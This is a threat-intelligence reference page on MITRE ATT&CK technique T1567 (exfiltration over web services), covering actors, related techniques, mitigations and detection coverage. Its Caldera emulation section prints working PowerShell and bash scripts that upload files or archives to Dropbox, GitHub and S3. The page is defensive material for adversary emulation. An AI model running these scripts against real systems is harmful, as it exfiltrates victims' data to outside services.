T1567 · threatengine.sh

Home/ATT&CK Technique/Exfiltration Over Web Service

ATT&CK Technique

Exfiltration Over Web Service

T1567 · exfiltration

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

ESXiLinuxmacOSOffice SuiteSaaSWindows

◆

Actors Using This

iranAgrius
russia_speaking_cybercrimeAkira
russia_speaking_cybercrimeALPHV / BlackCat
latin_america_brazilian_organized_cybercrimeAmavaldo
north_koreaAndariel
chinaAoqin Dragon
chinaAPT10
chinaAPT17
russiaAPT28
chinaAPT31
iranAPT33
iranOilRig
iranAPT35
north_koreaAPT37

◈

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.

reconnaissance earlier

T1598 · Phishing for Information ×1.27 T1598.003 · Spearphishing Link ×1.27

resource-development earlier

T1585.003 · Cloud Accounts ×1.27 T1608.005 · Link Target ×1.27

initial-access earlier

T1659 · Content Injection ×1.27

persistence earlier

T1136.001 · Local Account ×1.27 T1543.001 · Launch Agent ×1.27

credential-access earlier

T1003.005 · Cached Domain Credentials ×1.27 T1110.004 · Credential Stuffing ×1.27

collection earlier

T1185 · Browser Session Hijacking ×1.27 T1056.002 · GUI Input Capture ×1.27

other same

T1564.003 · Hidden Window ×1.27 T1218.010 · Regsvr32 ×1.27 T1218.007 · Msiexec ×1.27 T1218.001 · Compiled HTML File ×1.27

▣

Mitigations

MITRE ATT&CK mitigations - vendor-agnostic guidance for reducing exposure to this technique.

M1021Restrict Web-Based Content

Restricting web-based content involves enforcing policies and technologies that limit access to potentially malicious websites, unsafe downloads, and unauthorized browser behaviors. This can include URL filtering, download restrictions, script blocking, and extension control to protect against exploitation, phishing, and malware delivery.

Deploy Web Proxy Filtering

Use solutions to filter web traffic based on categories, reputation, and content types.
Enforce policies that block unsafe websites or file types at the gateway level.

Enable DNS-Based Filtering

Implement tools to restrict access to domains associated with malware or phishing campaigns.
Use public DNS filtering services to enhance protection.

Enforce Content Security Policies (CSP)

Configure CSP headers on internal and external web applications to restrict script execution, iframe embedding, and cross-origin requests.

Control Browser Features

Disable unapproved browser features like automatic downloads, developer tools, or unsafe scripting.
Enforce policies through tools like Group Policy Management to control browser settings.

Monitor and Alert on Web-Based Threats

Use SIEM tools to collect and analyze web proxy logs for signs of anomalous or malicious activity.
Configure alerts for access attempts to blocked domains or repeated file download failures.

M1057Data Loss Prevention

Data Loss Prevention (DLP) involves implementing strategies and technologies to identify, categorize, monitor, and control the movement of sensitive data within an organization. This includes protecting data formats indicative of Personally Identifiable Information (PII), intellectual property, or financial data from unauthorized access, transmission, or exfiltration. DLP solutions integrate with network, endpoint, and cloud platforms to enforce security policies and prevent accidental or malicious data leaks.

Sensitive Data Categorization

Use Case: Identify and classify data based on sensitivity (e.g., PII, financial data, trade secrets).
Implementation: Use DLP solutions to scan and tag files containing sensitive information using predefined patterns, such as Social Security Numbers or credit card details.

Exfiltration Restrictions

Use Case: Prevent unauthorized transmission of sensitive data.
Implementation: Enforce policies to block unapproved email attachments, unauthorized USB usage, or unencrypted data uploads to cloud storage.

Data-in-Transit Monitoring

Use Case: Detect and prevent the transmission of sensitive data over unapproved channels.
Implementation: Deploy network-based DLP tools to inspect outbound traffic for sensitive content (e.g., financial records or PII) and block unapproved transmissions.

Endpoint Data Protection

Use Case: Monitor and control sensitive data usage on endpoints.
Implementation: Use endpoint-based DLP agents to block copy-paste actions of sensitive data and unauthorized printing or file sharing.

Cloud Data Security

Use Case: Protect data stored in cloud platforms.
Implementation: Integrate DLP with cloud storage platforms like Google Drive, OneDrive, or AWS to monitor and restrict sensitive data sharing or downloads.

◈

Detection Coverage

2/6 layers

Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).

Behavioral / log (Sigma) 11

Analytics (MITRE CAR) none

Runtime / container (Falco) none

File / malware (YARA) none

Network (Suricata/Snort) 61

Vuln scan (Nuclei) none

▸

Caldera Emulation

MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.

exfiltrationwindows, linuxExfil Compressed Archive to Dropbox

$SourceFile = (Get-Item #{host.dir.compress});
$RemoteName = "$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)";
$TargetFilePath = "/#{dropbox.target.dir}/$RemoteName";
$ApiKey = "#{dropbox.api.key}";

$url = "https://content.dropboxapi.com/2/files/upload";

$file = [IO.File]::ReadAllBytes($SourceFile);
[net.httpWebRequest] $req = [net.webRequest]::create($url);

$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }';
$authorization = "Bearer " + $ApiKey;

$req.method = "POST";
$req.Headers.Add("Authorization", $authorization);
$req.Headers.Add("Dropbox-API-Arg", $arg);
$req.ContentType = 'application/octet-stream';
$req.ContentLength = $file.length;
$req.TimeOut = 50000;
$req.KeepAlive = $true;
$req.Headers.Add("Keep-Alive: 300");
$reqst = $req.getRequestStream();
$reqst.write($file, 0, $file.length);
$reqst.flush();
$reqst.close();

[net.httpWebResponse] $res = $req.getResponse();
$resst = $res.getResponseStream();
$sr = ne

exfiltrationlinux, windowsExfil Compressed Archive to Github Gist

GHUser="#{github.user.name}";
GHPAT="#{github.access.token}";
FileContent=$(base64 #{host.dir.compress});
LocalFile='#{host.dir.compress}';
RemoteFile="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)";
tmp_file=$(mktemp);
echo "{\"public\": false,\"files\": {\"$RemoteFile\": {\"content\": \"${FileContent}\"}}}" > $tmp_file;
curl --silent --output /dev/null --show-error --fail -X POST -d @$tmp_file -u $GHUser:$GHPAT https://api.github.com/gists;
rm $tmp_file

exfiltrationlinux, windowsExfil Compressed Archive to Github Repository

GHUser="#{github.user.name}";
GHRepo="#{github.repository.name}";
GHPAT="#{github.access.token}";
GHBranch='#{github.repository.branch}';
LocalFile='#{host.dir.compress}';
Header="Authorization: token $GHPAT";
RemoteName="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename $LocalFile)";
echo "{\"message\":\"Committed $RemoteName\", \"branch\":\"$GHBranch\", \"content\":\"" >/tmp/b64;
base64 -w 0 $LocalFile >>/tmp/b64;
echo "\"}" >>/tmp/b64;
content=$(curl -s -X PUT -H "Accept: application/vnd.github.v3+json" -H "$Header" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);
rm /tmp/b64;

exfiltrationlinux, windowsExfil Compressed Archive to S3 via AWS CLI

LocalFile='#{host.dir.compress}';
RemoteName="exfil-#{paw}-$(basename $LocalFile)";
aws s3 cp #{host.dir.compress} s3://#{s3.source.name}/$RemoteName;

exfiltrationlinux,windows,darwinExfil Compressed Archive to S3 via Golang

s3upload "#{host.dir.compress}" "#{s3.source.region}" "#{s3.source.name}" "aws-#{paw}-compressed" 45s

exfiltrationlinux, windowsExfil Directory Files to GitHub

GHUser="#{github.user.name}";
GHRepo="#{github.repository.name}";
GHPAT="#{github.access.token}";
GHBranch='#{github.repository.branch}';
LocalDirectory=#{host.dir.staged};
Header="Authorization: token $GHPAT";

for file in $LocalDirectory/*.*; do
  TempName=$(echo $file | sed "s/ /-/g")
	RemoteName="$(date '+%Y%m%d%H%M%S')-exfil-#{paw}-$(basename "$TempName")";
	echo "{\"message\":\"Committed $(basename $TempName) at: $(date)\", \"branch\":\"$GHBranch\", \"content\":\"" >/tmp/b64;
  base64 -w 0 "$file" >>/tmp/b64;
  echo "\"}" >>/tmp/b64;
	content=$(curl -s -X PUT -H "Accept: application/vnd.github.v3+json" -H "$Header" https://api.github.com/repos/$GHUser/$GHRepo/contents/$RemoteName -d @/tmp/b64);
  rm /tmp/b64;
done;

▣

Comply & Defend

NIST 800-53AC-02, AC-03, AC-04, AC-06, AC-16, AC-20, AC-23, CA-03, CA-07, SA-08, SA-09, SC-07, SC-28, SC-31, SI-03, SI-04, SR-04

D3FEND11 defensive techniques

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE ATT&CK Atomic Red Team car (MITRE)

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin